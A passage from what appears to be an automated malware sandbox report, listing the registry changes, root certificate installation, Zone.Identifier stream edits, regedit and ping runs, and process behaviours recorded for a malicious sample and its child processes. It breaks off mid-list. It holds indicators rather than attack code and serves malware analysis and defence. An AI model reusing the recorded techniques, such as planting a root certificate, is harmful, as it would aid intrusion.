mcXQQ_4vhghRXKoYPq8IHK8j.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" mcXQQ_4vhghRXKoYPq8IHK8j.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WW6060MI-ED3Y-MI7M-57W2-EJZ5M77G1X0K}\1 = "2812" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 550e9626ba7dd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "332983774" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000c88b751e6a1b3f8106b9f2913dfdd6ec08db9c4c9d3da355e72178145f517111eb2fbed82550fdc9b9ba7c6060179d64672de2ad836688865946bc775403b3276fb8da70ddd546a7d3c9e92f4b0a9ca6b1f42f14de308709c787ef0ea35ea1336246033f264ca02bdb059d82f575d309e450e2e7173c9d687e068efa4903bd98e8f8c7c90b54a0aba28e4462ddfae4e62c62a1963f28fee86fe231b9d69022f2b1f0400afd8c62f3d18447f9f338c8604748dd422295c184bd3a0c395da7cdd74f4dd201769641878507f568cbcfdfbafd234fbdc9231df83b3071b7b0e6a547712f189e4111d1f7f837cb33d05f053e4514dbd5b77295d89ee20b71e9ee038d08b64dedab9c2a42c234d7e7098846b13c3934f2e52242c00972c8242660dbc2fe01c8a23ad97d46ad1eb0ff06eab85df9b33f0074d4068acffe1361dadad8dfa73229ebc6662d43a1150a5e2c2569a8bfa2ccad7b266a9b44a8c7a752fe0b564668e392ece55d719739e2964ed9063441277ff832b9de3bcc8e055afb6a13435bc3fe763ef5cd9d81aa8a0360a6619e6e607807712d9e04019491169bf10e6c86132269c051 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000bef3af15883b0f57305064b94b4ebc69e69f9eb21cc768ea6dfd266b7b5646124757ca7bf330c851e20fa1ca8b4f60f29fb8b8ae46c80424d14ce9ae948f MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QJ2559JN-BF7A-LM2A-20M4-JBF9M43Q7G3S}\1 = "3044" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 4 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz! MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0e543e2bba7dd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{0A01AFF7-E8BC-4B38-81E9-E9A6F9708AB2}" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 sonia_3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e sonia_3.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\ProgramData\MUW2EEXT892HK8FP.exe:Zone.Identifier 8EA1.exe File opened for modification C:\ProgramData\MUW2EEXT892HK8FP.exe:Zone.Identifier 8EA1.exe -
Runs .reg file with regedit 2 IoCs
pid Process 4320 regedit.exe 5704 regedit.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4784 PING.EXE 3488 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2780 sonia_2.exe 2780 sonia_2.exe 1124 rundll32.exe 1124 rundll32.exe 984 svchost.exe 984 svchost.exe 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 4360 WerFault.exe 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found 3016 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3016 Process not Found -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 2780 sonia_2.exe 2676 MicrosoftEdgeCP.exe 2676 MicrosoftEdgeCP.exe 5752 Sensitive.exe.com 5308 Acre.exe.com 5308 Acre.exe.com -
Suspicious use of AdjustPrivilegeToken 64 IoCs
